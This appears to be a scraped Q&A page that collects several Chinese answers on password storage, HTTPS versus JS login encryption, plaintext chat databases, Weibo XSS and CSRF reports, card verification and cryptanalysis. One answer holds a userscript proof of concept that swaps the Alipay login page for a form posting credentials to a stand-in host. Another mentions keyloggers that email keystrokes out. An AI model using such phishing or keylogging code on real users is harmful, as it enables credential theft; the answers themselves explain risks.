的储存的网页密码查看方法,其实也并不是&b&太&/b&过于危险的。&br&以前查看密码管理器里的密码是不用输入现在所登陆的电脑账户的密码的。&i&(好像是,记不太清了)&/i&&br&&blockquote&&i&[至少以前是可以在实验性功能里关掉查看密码前先验证密码的,当然现在去掉了,查看密码一定要先输入账户密码;但是还可以&/i&&i&进相应的登录界面后把密码框的
text 就能看到密码,这也就是 Google 最初以接触即不安全的理由拒绝查看密码需要验证的原因。(来自评论区,谢谢 &a data-hash=&2ca4c382fff& href=&///people/2ca4c382fff& class=&member_mention& data-hovercard=&p$b$2ca4c382fff&&@陆洪涛&/a&&a data-hash=&b1aad77fc192& href=&///people/b1aad77fc192& class=&member_mention& data-hovercard=&p$b$b1aad77fc192&&@吴煅&/a& ) &/i&&i&]&br&[Chrome 的密码储存是用本地账户的密码加密的]&/i&&/blockquote&&br&&br&那么,我们又用这个例子吧w&br&&br&我们用电脑的时候就像是打开了保险柜,但是守着保险柜,其他人不敢来偷东西。&br&离开了保险柜却不上锁,被别人偷走了密码,自己的安全意识也是不够的。&br&&br&所以说,Chrome 的密码安全是建立在账户安全的前提下的,离开了账户安全,一切都是空谈。&br&-----------------&br&所以说,电脑的账户安全也是建立在电脑的物理安全的基础上的,离开了物理安全,一切都是空谈。&br&-----------------&br&所以说,想要&b&更高程度&/b&的安全,要从数据上入手,比如 Bitlocker 等。&br&这样的话,就算别人把你的电脑拐跑了,也很难拿到什么有用的数据。&blockquote&&i&(时间非常长的时候依然有破解的可能)&/i&&/blockquote&(如果你习惯用弱密码的话,那什么加密都救不了你w)
保险柜拿到手就能强行打开 哇保险柜好不安全啊QAQ 打开机箱就能拆硬盘读取数据 哇硬盘好不安全啊QAQ 拆下手机的闪存就能慢慢破解加密数据 哇手机的加密好不安全啊QAQ 防盗门的锁头轻易就能撬开 哇防盗门好不安全啊QAQ 进入服务器机房就能破坏服务器 哇服务…
稍微纠正一下其它答案中的问题。&br&&br&js加密(比如腾讯)没什么安全性可言,攻击者只要把你访问的页面整个替换掉就可以了。共用路由器的话,用ARP病毒应该很容易做到。&br&&br&按照类似的逻辑,只要在登录的时候用户看不到地址是https,任何“其它方法”都不安全。就不必讨论js或者类似方案了。&br&&br&就算是用插件登录,在很多时候,攻击者也可以修改页面,让输入框根本不使用这个插件。所以除非插件另外有验证页面内容的功能,还是不能不使用https。而且就算使用https,对于本地的病毒之类的问题,有些插件也不能阻止攻击者绕过这个插件。&br&&br&比如以下GreaseMonkey脚本在Linux,Firefox中验证成功,Windows和其它浏览器就不逐个尝试了(如果Windows不行的话,还有一种合理的解释是Linux版仅仅用于避免Windows用户访问“更不安全”的页面)。以下脚本仅仅用于验证概念。真正用于攻击的话,首先要把页面做得和支付宝官方页面比较像,还要能自动给Firefox安装脚本,最好还能避免用户发觉,让用户以为登录不上去是因为网络错误或密码错误。&br&&br&// ==UserScript==&br&// @name
alipay hacker test&br&// @namespace
afdsjalfwhahefhwadskla&br&// @include
htt&b&ps://ww&/b&w.alip&b&ay.c&/b&om/&br&// @version
1&br&// @grant
none&br&// ==/UserScript==&br&document.body.innerHTML='&form action=“ht&b&tps://w&/b&ww.exam&b&ple.c&/b&om& method=&get&&&input name=&username&&&input type=&password& name=&password&&&input type=&submit&&&/form&'&br&&br&所以说,插件在很多时候也都是自欺欺人。可能阻止了一部分流行的病毒的行为,但是有针对性的攻击是否也能阻止,难说。只考虑网络安全的话用https即可,不需要另外的插件。&br&&br&更进一步地说,考虑病毒的影响的话,某些直接使用自己的客户端的验证方式也无法保证安全。比如某个病毒作者自己做一个登陆框,替换掉QQ.exe,QQ自身没有任何防范方法。只是用户很快就会发现问题而已,因为登录不上去。对QQ可能影响不大,但是想象一下要是有银行用类似的方法,病毒可以在攻击者得到密码之后,立即破坏系统文件,切断用户的网络,可以稍微用蓝屏之类的方式掩饰一下,避免用户很快直接联系银行,然后攻击者立即将用户的存款转出。只是病毒的体积可能有些大,看现在的网速可能也不是很大的问题。&br&&br&网速比较快的话,USB Key也可以做个程序远程与硬件交互,攻击者那边再装个虚拟的硬件驱动,实在不行就用虚拟机。有些设备可能解决了这些问题,毕竟网络不太可能完全没有延迟,而且带宽有限。有些设备可能没有,或者目的仅仅是避免依赖于密码。&br&&br&但是比如说,使用手机短信验证,而且保证手机不中毒,或者比如说使用带有屏幕的USB Key,那么应该是安全的。不过个人认为受盗号影响不大的普通网站没必要在用户自己中毒造成的问题上下太多功夫。这是用户自己和杀毒软件的责任。&br&&br&另外关于明文存储密码,有些人有概念错误(以下专业的人可以不必看)。明文存储密码不是要避免有人用用户的密码去登录其它网站,而是在网站自身的数据库泄露之后,避免有人直接用泄露的密码直接登录自己的网站。“从技术上保证一个网站的密码不能用于登录另一个网站”,不应该是网站的责任,而是浏览器应该做的事,虽然现在没有哪个浏览器做了这件事。&br&&br&服务器的数据库的所谓密码加密,其实是不可逆的hash,hash之后直接与数据库比较。但是js加密(或者https加密)要是用同样的方法的话,攻击者得到加密之后的内容,就可以跳过js加密的步骤,用加密后的内容直接通过验证。所以任何客户端的加密方法,都应该保证一个加密后的数据不能重复使用两次。使用的算法一般应该是可逆的,也有一些其它方案,比如两次操作顺序可交换的不可逆算法。&br&&br&所以以上就有三种不同意义的加密:1.用户在不同网站上使用不同的密码;2.传输过程中的加密;3.网站自身数据库的加密。如果要达到目的,任何两个都不能共用同一加密过程。&br&&br&第一条比起在浏览器上实现这个功能,现在似乎有个另外的趋势是用一个账号登录多种服务。实际上有一些安全隐患,因为某些不重要的小网站可以用QQ、微博账号登录,某些购物网站一样也可以用QQ、微博账号登录。这样在某些明知不安全的环境,可能比如一些网吧,注重安全而又想登录小网站的人就会比较困扰。&br&&br&&b&补充:&/b&本答案的主要目的是&b&“稍微纠正一下其它答案中的问题。”&/b&太长无法作为评论,而且很多答案的问题相似,所以作为一个答案发出来,仅此而已。所以以上各段大体上说的也不是同一件事,也不都与题主的问题有关。如果对某一部分本来就没有疑问,也没有看到别人与此矛盾的说法,可以自行忽略。&br&&br&关于病毒的部分,我没有打算特别去说病毒的问题,也不认为一般网站应该考虑病毒的问题。只是因为看到有其他回答把插件和https相比较。我是说很多浏览器插件并不能完全代替https的作用,所以两者很难直接比较。就算用js+插件的方式,如果不实现完全类似于https的功能的话,也很难达到https那样的安全性。&br&&br&&b&简单地说:&br&1.arp攻击可以篡改数据;&br&2.篡改程序的形式的中间人攻击基本无技术含量;&br&3.只要地址栏不写https,或者用户不明确知道地址栏应该是https,就有篡改程序的机会;&br&4.大部分插件并不能代替https,即使用了插件也同样需要https,除非这个插件也具备某些人所认为的https的全部“缺点”;&br&5.要达到服务器不保存明文密码所要实现的目的,一般服务端需要把传输的数据还原成明文,前后两个步骤互相独立,不能混同,也存在其它方法,但是客户端的操作也不是简单的hash,即使是不能防止篡改数据的js加密,也应该确实是加密,而不是只有hash;&br&6.是否明文传输密码(题主的问题)、是否明文保存密码、是否能防止一个网站密码泄露影响其它网站,是三件不同的事,不建议混合起来讨论,就像我这样;否则可能导致很多误会,就像我这样。&/b&
稍微纠正一下其它答案中的问题。 js加密(比如腾讯)没什么安全性可言,攻击者只要把你访问的页面整个替换掉就可以了。共用路由器的话,用ARP病毒应该很容易做到。 按照类似的逻辑,只要在登录的时候用户看不到地址是https,任何“其它方法”都不安全。就不…
iphone上qq聊天记录存储文件是qq.db&br&明文存储(安卓的还亦或了一下)&br&用数据库软件直接可以看的(这图是网络上,我自己的那个忘了放哪里了,反正这个是一样的)&br&&img src=&/68c323c39e214cd275c622c4847cab42_b.jpg& data-rawwidth=&753& data-rawheight=&211& class=&origin_image zh-lightbox-thumb& width=&753& data-original=&/68c323c39e214cd275c622c4847cab42_r.jpg&&然后iphone上微信也是明文存储,在MM.sqlite&br&&img src=&/ec38cb03c4ca8737bd88_b.jpg& data-rawwidth=&709& data-rawheight=&116& class=&origin_image zh-lightbox-thumb& width=&709& data-original=&/ec38cb03c4ca8737bd88_r.jpg&&而且这个微信存储的还有你很久远的漂流瓶这些信息可能零零总总还有点&br&还有你删除的那些微信好友啊&br&以及通过什么途径加的好友 都很详细&br&这些是本地查看,还可以通过网络劫持&br&对于网络劫持的这些
现在很多软件都可以做到&br&我之前的外企公司
他们就安装这些软件的&br&只要想看
不只是是你qq了&br&所以会有同事 被人事莫名其妙的叫去谈话 &br&问 最近有什么不顺心 同事关系怎样&br&基本问这些可能就是你在公司投简历被检测到了&br&还有就是之前一个公司直接劫持你所有上网数据&br&直接分析你聊天 上网内容 &br&甚至会统计词频了,,,&br&然后类比工作内容&br&ios9.02之前的都可以看,不知道后来的有没有加密。。。&br&我们天朝所有的都给&b&郭嘉&/b&留后门的,&br&意思就是&b&郭嘉&/b&想看
你就是赤果果的 &br&不要过分担心&br&只要不是专门对你很关注&br&一般不会对你的私人信息造成多大威胁&br&对于我的这些手机&br&本身设置的权限也多&br&涉及金钱的更是留有各种安全设置&br&所以就算手机被偷
丢了&br&如果那谁不还&br&可能我会让那个人哭!&br&我手机给自己留了不少后门。&br&ˉ\_(〝ノ)_/ˉ&br&#关于劫持方法很多,网页端 pc客户端 app客户端,但不管平台是那个,你总归要输入吧,所以扫键盘也是一种方法,代码后台发邮件活着直接存后台亦或者代码上传服务器自动,,,想拿自己试水,可以网上找一些键盘记录的代码很多,我的是python版的&br&---------------之前在公众号写过一个类似的文章,无聊可以看下-------------------------------&br&&img src=&/5c50ffd4de9a33a191c24_b.png& data-rawwidth=&415& data-rawheight=&359& class=&content_image& width=&415&&
iphone上qq聊天记录存储文件是qq.db 明文存储(安卓的还亦或了一下) 用数据库软件直接可以看的(这图是网络上,我自己的那个忘了放哪里了,反正这个是一样的) 然后iphone上微信也是明文存储,在MM.sqlite 而且这个微信存储的还有你很久远的漂流瓶这些信息…
对的,所以你知道为什么手机上很多银行的应用输入密码的框框长得跟别处不一样了:禁用第三方输入法甚至系统输入法从而减小攻击面 (attack surface)。这也是我为什么从来不用任何所谓「云输入法」的原因:就好像一直有个人在背后盯着你敲键盘一样不靠谱。
对的,所以你知道为什么手机上很多银行的应用输入密码的框框长得跟别处不一样了:禁用第三方输入法甚至系统输入法从而减小攻击面 (attack surface)。这也是我为什么从来不用任何所谓「云输入法」的原因:就好像一直有个人在背后盯着你敲键盘一样不靠谱。
...为什么我觉得此小三信息就是各种.torrent的集合体...
...为什么我觉得此小三信息就是各种.torrent的集合体... O_o
当然能,而且手段比较多。xss是一类,csrf也是一类,还有SQL注入泄漏token等信息,乌云平台有很多这样的例子,我列举几个&br&通过黑掉&a href=&///?target=http%3A//& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&拿下雷军的微博:&br&&a href=&///?target=http%3A//wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&我是如何登录任意新浪微博用户的(雷军微博演示)&i class=&icon-external&&&/i&&/a&&br&以及黑掉另外一个子站点拿下国民老公王思聪的微博:&br&&a href=&///?target=http%3A//wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&我是如何登录任意新浪微博用户的(王思聪微博演示)&i class=&icon-external&&&/i&&/a&&br&通过Oauth认证, &a data-hash=&bcc0da3e9cd673c06df5d& href=&///people/bcc0da3e9cd673c06df5d& class=&member_mention& data-editable=&true& data-title=&@Fooying& data-hovercard=&p$b$bcc0da3e9cd673c06df5d&&@Fooying&/a& 已经有文章介绍了。&br&通过Android客户端老版本的uxss进行hack你的微博:&br&&a href=&///?target=http%3A//wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&扫描新浪微博安卓客户端UXSS附蠕虫利用&i class=&icon-external&&&/i&&/a&&br&以及flashxss 形成的xss后门:&br&&a href=&///?target=http%3A//wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&新浪微博flash xss rookit (乌云峰会视频演示-0x04)&i class=&icon-external&&&/i&&/a&&br&还有csrf刷粉丝:&br&&a href=&///?target=http%3A//wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&新浪微博csrf刷粉丝&i class=&icon-external&&&/i&&/a&&br&以及通过csrf来控制你的微博发布内容:&br&&a href=&///?target=http%3A//www.wooyun.org/bugs/wooyun-& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&新浪微博首页再来一波蠕虫&i class=&icon-external&&&/i&&/a&&br&以上,这些都不需要知道你的密码,即可登录你的微博。
当然能,而且手段比较多。xss是一类,csrf也是一类,还有SQL注入泄漏token等信息,乌云平台有很多这样的例子,我列举几个 通过黑掉拿下雷军的微博:
以及黑掉另外一个子站点拿下国民老…
&a data-hash=&aac190c8ad2a& href=&///people/aac190c8ad2a& class=&member_mention& data-editable=&true& data-title=&@shotgun& data-hovercard=&p$b$aac190c8ad2a&&@shotgun&/a&要不你来答一下?&br&&br&我觉得这个问题挺复杂的…我个人的感觉,总结起来是这样:国外(美国为主)尽量信任用户,同时信任自身,但不能完全信任或者说方便必须排在安全之后的时候认真地弄安全强化,实施上设计良好执行一般都不差;中国不信任用户、盲目信任自身,然后弄安全强化的时候要么非常极端要么瞎弄。&br&&br&国外网站并不总是那么信任用户的。比方说银行等机构的网站,都强制了换电脑换地点重登录、登录后15分钟无操作强制退出、多要素验证、逆向要素验证、密码轮替周期等等,非常严格。大多数购物、服务订购等网站并不搞那么多安全,因为用户发生盗用只有少数情况无法追回损失,而这部分不少时候会被保险赔偿。&br&&br&国内网站则是主要因为出事了无法保证用户的财产安全,所以人人自危,要撇清权责关系,于是稍微有点涉及金钱交易的网站都要搞多因素。但实施上非常不负责任,一水的短信验证码,根本不涉及用户实际身份的验证(当然也无力涉及,成本太高,连知道是谁的犯罪分子都抓不到哪儿那么容易验证一个普通人的身份);或者操作上存在严重漏洞(早些时候的一票密保卡们、URL内嵌身份信息等做法)。最终只是把责任强行推走而已。&br&&br&说到底,我认为关键还是法律无法有效实施导致了操作上的差异。&br&&br&当然,外国的月亮并不更圆。虽然在美国账户被盗可以最终没有损失,但搭进去的时间成本可以很高。国内虽然账户很容易出事儿,但关键系统往往措施充分,不易发生损失(废话我自己都很难用犯罪分子一般也并不会比我用起来方便许多)。美国网站安全措施虽然实施上可以很优秀但因为缺少花样繁多数量巨大的攻击考验所以其实并不多么强健。中国虽然系统健全但制度上各种愚蠢三天两头莫名其妙地被盗明码密码…
要不你来答一下? 我觉得这个问题挺复杂的…我个人的感觉,总结起来是这样:国外(美国为主)尽量信任用户,同时信任自身,但不能完全信任或者说方便必须排在安全之后的时候认真地弄安全强化,实施上设计良好执行一般都不差;中国不信任用户、盲目…
选任何一个都比犹豫不决好。&br&&br&选一个,然后坚持用下去。而不是在门口等着。
选任何一个都比犹豫不决好。 选一个,然后坚持用下去。而不是在门口等着。
国外确是「签名验证」更为主流。即使设密码的国内信用卡,在国外消费,如果走Visa、Master等通道,也无需输入密码。&br&&br&问过银联和招行的从业人员,何以产生这种习惯上的差异?没有得到有说服力的回答。以下是我的个人推测:&br&&br&上世纪五十年代末,美国金融机构开始发行信用卡,并成为一种流行的商业模式。但那个时代的通信网络技术,无法支持以即时密码交互方式进行的身份验证。因此,「签名验证」是彼时安全、效率与技术综合权衡后的最优选择。&br&&br&中国银行卡联合组织(中国银联),成立于2002年。内地信用卡行业狂飙猛进,则始于2003年,业内称之为「中国信用卡元年」。也就是说,中国内地信用卡的大规模发展,是在二十一世纪,此时,银行、商户、结算系统间的即时数据交互,在技术上已经全面实现。&br&&br&显然,相同成本下,「密码确认」相对「签名验证」,更加安全、更加可靠。因此「密码确认」成为国内信用卡发行机构的主推模式,并培育了用户习惯。&br&&br&由此可见,信用卡消费采用「签名验证」方式,是欧美等国特定历史条件下形成的特定习俗,这种方式并无优越之处。只因为盗刷金额比例在金融机构可承担的坏账率之下,国外金融机构也就顺应了客户的这种习惯,未作强制变更。&br&&br&而国内信用卡消费主流采用的「密码验证」方式,技术上是更先进的,理应也将得到更大范围的推广。(至于「密码」与「签名」带来的不同赔付责任,则是另外一个可以探讨的问题。)&br&&br&信用卡消费验证方式的背后,是后发优势带来的不同技术路径。类似还有美国家庭对于录音电话的使用习惯、个人支票的使用习惯,等等。&br&&br&可惜,读过不少理财专家、金融学者对于信用卡使用的文章,没见有人说破这一层,反而是不加分辨地对国外惯例大加赞赏,众口烁烁认为其代表了先进生产力的发展方向……
国外确是「签名验证」更为主流。即使设密码的国内信用卡,在国外消费,如果走Visa、Master等通道,也无需输入密码。 问过银联和招行的从业人员,何以产生这种习惯上的差异?没有得到有说服力的回答。以下是我的个人推测: 上世纪五十年代末,美国金融机构开…
以对称加密体系为例说明(实际对于非对称加密体系也是同理)&br&&img src=&/a0c57a313f827beff2b2c38_b.png& data-rawwidth=&635& data-rawheight=&149& class=&origin_image zh-lightbox-thumb& width=&635& data-original=&/a0c57a313f827beff2b2c38_r.png&&实际在我们的网络安全模型中一般假设所有的加密算法都是公开的,密码体系的安全性依赖于秘钥的安全性,秘钥只有发送方和接收方知道,一旦第三方得知这个秘钥,那他们的通信就被攻破了。&br&&br&单说选择明文攻击和选择密文攻击你可能体会不深,所以我把攻击强度不同的五种攻击方式都写出来对比一下你就可以明白这二者有何不同。&br&&br&这里我们首先假设通信双方,Sharon和Christopher已经完成了秘钥交换,秘钥k是双方已知的,开始进行如下通信:&br&&img src=&/3c0f9b579b7ea4afe9e206a_b.png& data-rawwidth=&716& data-rawheight=&417& class=&origin_image zh-lightbox-thumb& width=&716& data-original=&/3c0f9b579b7ea4afe9e206a_r.png&&&br&那么通信过程中一共产生的消息是三组明密文对&img src=&///equation?tex=%5Cleft%28+%7B%7Bp_1%7D%2C%7Bc_1%7D%7D+%5Cright%29& alt=&\left( {{p_1},{c_1}} \right)& eeimg=&1&&,&img src=&///equation?tex=%5Cleft%28+%7B%7Bp_2%7D%2C%7Bc_2%7D%7D+%5Cright%29& alt=&\left( {{p_2},{c_2}} \right)& eeimg=&1&&和&img src=&///equation?tex=%5Cleft%28+%7B%7Bp_3%7D%2C%7Bc_3%7D%7D+%5Cright%29& alt=&\left( {{p_3},{c_3}} \right)& eeimg=&1&&&br&&br&&ul&&li&&b&唯密文攻击&/b&:只知道密文,也就是&img src=&///equation?tex=c_1%2Cc_2%2Cc_3& alt=&c_1,c_2,c_3& eeimg=&1&&,那只能通过统计特性分析其中有什么规律了&/li&&li&&b&已知明文攻击&/b&:得到了一些给定的明文和对应的密文,在这里可以是&img src=&///equation?tex=%5Cleft%5C%7B+%7B%5Cleft%28+%7B%7Bp_1%7D%2C%7Bc_1%7D%7D+%5Cright%29%2C%5Cleft%28+%7B%7Bp_2%7D%2C%7Bc_2%7D%7D+%5Cright%29%2C%5Cleft%28+%7B%7Bp_3%7D%2C%7Bc_3%7D%7D+%5Cright%29%7D+%5Cright%5C%7D& alt=&\left\{ {\left( {{p_1},{c_1}} \right),\left( {{p_2},{c_2}} \right),\left( {{p_3},{c_3}} \right)} \right\}& eeimg=&1&&的任意非空子集。&/li&&li&&b&选择明文攻击&/b&:除了上面的基础,攻击者还可以任意创造一条明文比如“Excited”,并得到其加密后的密文。比如用一定的手段渗透Sharon的系统,但是不能直接攻破秘钥,于是只能以她的身份发“Excited”,然后用抓包或者别的方法得到她发送出来的加密的消息。&/li&&li&&b&选择密文攻击&/b&:除了已知明文攻击的基础,攻击者还可以任意制造或者选择一些密文,并得到其解密后的明文。比如用一定的手段在通信过程中伪造消息替换真实消息,然后窃取Sharon获得并解密的结果,有可能正好发现随手伪造的密文解密结果是有意义的,比如naive。&/li&&li&&b&选择文本攻击&/b&:可以制造任意明文/密文并得到对应的密文/明文,就是上面两者的结合。&/li&&/ul&&br&以上攻击强度自上至下由弱到强。选择密文攻击和选择明文攻击的不同之处就是加解密方向不同。实际上这些攻击都是Cryptanalyze,使用哪一种取决于攻击者(cryptanalyst)掌握的资源和手段。&br&&br&很惭愧,只做了一些微小的工作。&br&&br&References&br&[1] Stallings, William, et al. &Cryptography and Network Security Principles and Practice.& (2001).
以对称加密体系为例说明(实际对于非对称加密体系也是同理) 实际在我们的网络安全模型中一般假设所有的加密算法都是公开的,密码体系的安全性依赖于秘钥的安全性,秘钥只有发送方和接收方知道,一旦第三方得知这个秘钥,那他们的通信就被攻破了。 单说选择…
没加好友你要QQ号干啥?
没加好友你要QQ号干啥?
Step 1:&br&U2FsdGVkX1+GwIYSkb6ewlmShIAAR+k1oKV87HFVoZlaCLjKUa3RsXxMIzs88xv2gvX9wXRao4SLaiOyB8I13w==&br&(已修改,手打眼花了。)&br&应该是Base64编码,先搞回去成。&br&&br&Step2:&br&获得base64之前的数据。&br&&br&Step3:&br&&p&
713864&br&&/p&&p&
613574&/p&&p&……&/p&&p&
531746&/p&&p&
&/p&&p&八皇后问题共有以上92个解。&/p&&p&题目中,1月是 月是 &br&&/p&&p&那么,按次序可知密钥,5月 &/p&&br&Step4:&br&对称加密,最常用的是DES。&br&&br&有人已经搞出来了。实际是AES。哈。。。&br&&br&-------------------------------------------------------------&br&总结:最简单的办法,就是找到 &a href=&///?target=http%3A//tool.oschina.net/encrypt& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&在线加密解密&i class=&icon-external&&&/i&&/a& 类似网站。&br&把结果这串 base64后的字符放进去,然后找到密钥,反向解密。&br&&br&&br&&br&&br&-------------------------------------------------------------&br&给大家练习一下,同样这么一串,&br&可惜月度密钥已经到了年底,据说加密算法也改了。&br&U2FsdGVkX18rjIIWJsAYA6lYz+FajhQuE6FhW7r508AUqypOHWsu3wbrZcfyVTxRzNfdRILDK7o/B2psmpOfvO0=
Step 1: U2FsdGVkX1+GwIYSkb6ewlmShIAAR+k1oKV87HFVoZlaCLjKUa3RsXxMIzs88xv2gvX9wXRao4SLaiOyB8I13w== (已修改,手打眼花了。) 应该是Base64编码,先搞回去成。 Step2: 获得base64之前的数据。 Step3:
补充,感谢 &a data-hash=&38406b7cec891e65c6d34& href=&///people/38406b7cec891e65c6d34& class=&member_mention& data-hovercard=&p$b$38406b7cec891e65c6d34&&@edwardz&/a& 的分享。&a data-hash=&38406b7cec891e65c6d34& href=&///people/38406b7cec891e65c6d34& class=&member_mention& data-editable=&true& data-title=&@edwardz& data-hovercard=&p$b$38406b7cec891e65c6d34&&@edwardz&/a&在私下讨论中,推荐了下述总结,希望对相关领域感兴趣的朋友们有所帮助:&a href=&///?target=http%3A//malb.io/are-graded-encoding-schemes-broken-yet.html& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&malb.io/are-graded-enco&/span&&span class=&invisible&&ding-schemes-broken-yet.html&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&。&br&&br&=============================&br&谢 &a data-hash=&acce64b190deca09bef6& href=&///people/acce64b190deca09bef6& class=&member_mention& data-editable=&true& data-title=&@LLQ654& data-hovercard=&p$b$acce64b190deca09bef6&&@LLQ654&/a& 、 &a data-hash=&9cec268fa4cf03f8cc3d8& href=&///people/9cec268fa4cf03f8cc3d8& class=&member_mention& data-editable=&true& data-title=&@玄星& data-hovercard=&p$b$9cec268fa4cf03f8cc3d8&&@玄星&/a& 邀。&br&&br&个人观点,仅供参考。答案主线将沿新闻稿论述进行剖析,简单讲一讲成果本身,并补充一些黑历史。&br&&br&在新闻稿中可以体现出,胡予濮教授所说的话是非常严谨的。仅从新闻稿的内容就可以得出断言,胡教授是一位非常严谨的学者,必须为其点赞。&br&&br&新闻稿链接:&a href=&///?target=http%3A///a2350338/& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/a&/span&&span class=&invisible&&/&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&胡予濮教授和贾惠文博士研究生的论文完整版链接:&a href=&///?target=http%3A//eprint.iacr.org/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Cryptology ePrint Archive: Report &i class=&icon-external&&&/i&&/a&&br&密码学三大顶级会议之一,EUROCRYPT 2016 Accepted Papers页面:&a href=&///?target=http%3A//ist.ac.at/eurocrypt2016/accepted.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&EUROCRYPT 2016&i class=&icon-external&&&/i&&/a&&br&&br&=============================&br&先说结论:胡予濮教授和贾惠文博士研究生的工作,对国际密码学有关Multilinear Map的研究来说是地震性质的成果。他们的工作结果表明,2013年由Sanjam Garg(当时是UCLA的博士研究生),Graig Gentry和Shai Halevi(IBM研究院研究员)利用Ideal Lattice所构造的GGH Multilinear Map,由于不满足Weak Discrete Log Problem假设,因此基于GGH Map所构造的One-round Multiparty Key Exchange Protocol,以及一个基于Exact-3-Cover Problem的Witness Encryption,存在安全漏洞。并断言,此安全漏洞的根源在于GGH Map,因此&b&可能导致&/b&基于GGH Map的密码学方案构造都是不安全的。这就意味着GGH Map的应用场景会被进一步压缩。同时,由于GGH Map几乎是所有现有Multilinar Map的基础,因此基于Multilinear Map的One-round Multiparty Key Exchange Protocol构造又回到了上古时代:仍然没有安全的构造实例。&br&&br&对国内的影响:成果本身表明,国内学者对于密码学前沿理论的研究,已经追上甚至超过国际研究的步伐。可以认为,国内顶级密码学者的研究水平已经和国际顶级学者持平。&br&&br&=============================&br&我本来一直都不太敢回答这个问题,原因是GGH Map对于我来说一直是一种无法理解的存在。对于胡予濮教授和贾惠文博士研究生的贡献,更是一直以来连浅显的理解都做不到。但因为下面的原因,我还是决定尽我所能,回答一下这个问题。&br&&br&首先,随着3天前刚刚听译完毕Vadim Lyubashevsky在Winter School on Cryptography 2012中有关Ideal Lattice and Its Applications,以及Craig Gentry在Winter School on Cryptography 2012中有关Somewhat Homomorphic Encryption的报告后,我终于有可能尝试去理解密码学界这3年来一直重点讨论的GGH Map,以及其应用的论文了。听译压制后的视频将会在大约3周后在&a href=&///?target=http%3A///course/50433& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&世界上最顶级的密码学课程课程详情&i class=&icon-external&&&/i&&/a&上发布。如果真的想&b&简单了解&/b&胡予濮教授和贾惠文博士研究生的贡献,可以把视频作为入门材料,结合PPT&a href=&///?target=http%3A///link%3Furl%3DW_E-N41p6jqFRqT2YTP5t9gpf4HUf-z5-Gq5N8AcPYNbXSE1gG6fiwEU-bdOEtMvzOi7k8lCcTKJ5Aj6mjoea1IjvT6f_bWm3z-MaqYPl9W& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&多线性映射方案分析Cryptanalysis of the GGH’13 multilinear map_百度文库&i class=&icon-external&&&/i&&/a&进行学习。&br&&br&其次,我认为已有的答案都有点偏了。并非讨论胡予濮教授和贾惠文博士研究生的贡献本身,转而变成了另一种风气。我觉得这样的趋势并不太好。科学研究本身需要安静,需要心如止水地理解和创新。与之相对的,就是急功近利,有了成果就被媒体大写特写。这不是反而落回了教育界一直以来对国内科研的批评点了吗?&br&&br&再次,近年来信息安全越来越热,相关的介绍和报道也是越来越多。先是支付宝漏洞,然后又是百度云盘,最近又出来一些听起来似乎特别高大上,但是经不起推敲的新闻。在批评企业良心什么的之前,还是要理智的思考问题,不要人云亦云。企业的有些做法的确不良心,有些做法是没办法的办法。举个简单的正面例子:&br&&br&&b&利用现有安全技术,在考虑用户可能忘记密钥的条件下,有可能实现云存储全盘加密+通过网页把文件安全分享给任意指定的第三方用户吗?&/b&&br&&br&=============================&br&高能预警,下面的回答比较难以理解,有很多名词出现。&br&&br&下面,我将沿新闻稿的描述进行剖析。因为原文中一些词语并没有对应上,所以我对原稿的翻译部分进行了些许修改,主要是用英文词汇置换中文翻译,这样可以看出知识点之间的关系。&br&&br&&blockquote&Diffie-Hellman密钥交换的提出,颠覆了人们“不事先进行秘密共享是无法进行保密通信”的传统观念,使得用户可以在一个完全开放的信道上,进行秘密共享,实现保密通信。这一思想上的突破,成为了现今密钥交换系统的基础,被广泛应用于网络通信。与经典密码学相对应,业界将1976年定为现代密码学元年。迪菲与赫尔曼也因此获得美国计算机协会ACM授予的2015年度“图灵奖”。&br&&/blockquote&有关这方面的介绍,请参见我的答案:&a href=&/question//answer/& class=&internal&&如何评价 Diffie 和 Hellman 获 2016 年图灵奖? - 刘巍然-学酥的回答&/a&,在此不多做叙述。&br&&br&&blockquote&直到2000年,密码学家Antoine Joux利用Bilinear Map,设计了第一个&b&非交互的&/b&三方密钥交换协议,在该问题上取得了阶段性突破,但仍无法将这种思想推广到四方以上参与者的密钥交换中。2003年,密码学家Dan Boneh和Alice Silverberg提出Multilinear Map这一概念,并指出多线性映射不但可以解决多方秘密交换这一公开问题,而且还可以用于构造其他更高级的密码应用方案,但他们却无法给出具体的代数实现。&/blockquote&多方密钥协商协议一直已经有了构造,但是无法达到&b&非交互&/b&。所谓非交互,就是协议只需要双方发送一次信息就可以完成协商过程。现有构造中,当参与方超过3个时,双方至少需要交互发送2次信息才可以完成密钥协商。&br&Multilinear Map的概念实际上是Bilinear Map的自然推广。之所以2003年提出了这一概念,是因为:&br&&ul&&li&2001年,Dan Boneh等人利用Bilinear Map构造了更高级的密码学应用方案:Identity-Based Encryption(基于身份的加密),&br&&/li&&li&2002年,Dan Boneh等人利用Bilinear Map构造了可证明严格满足签名安全需求的数字签名方案。&/li&&/ul&这两个成果的提出,让学者们了解到Bilinear Map这一代数结构,不仅可以构造简单的密钥协商协议,更可以构造更高级的密码学应用。自2001年开始,Bilinear Map也作为密码学热门研究方向,持续了10年左右的时间。&br&&br&然而,Bilinear Map无法自然推广为Multilinear Map。这是因为Bilinear Map中,被Map的群是椭圆曲线群,但Map后的群代数结构发生了变化,不再是椭圆曲线群。如果构造Multilinear 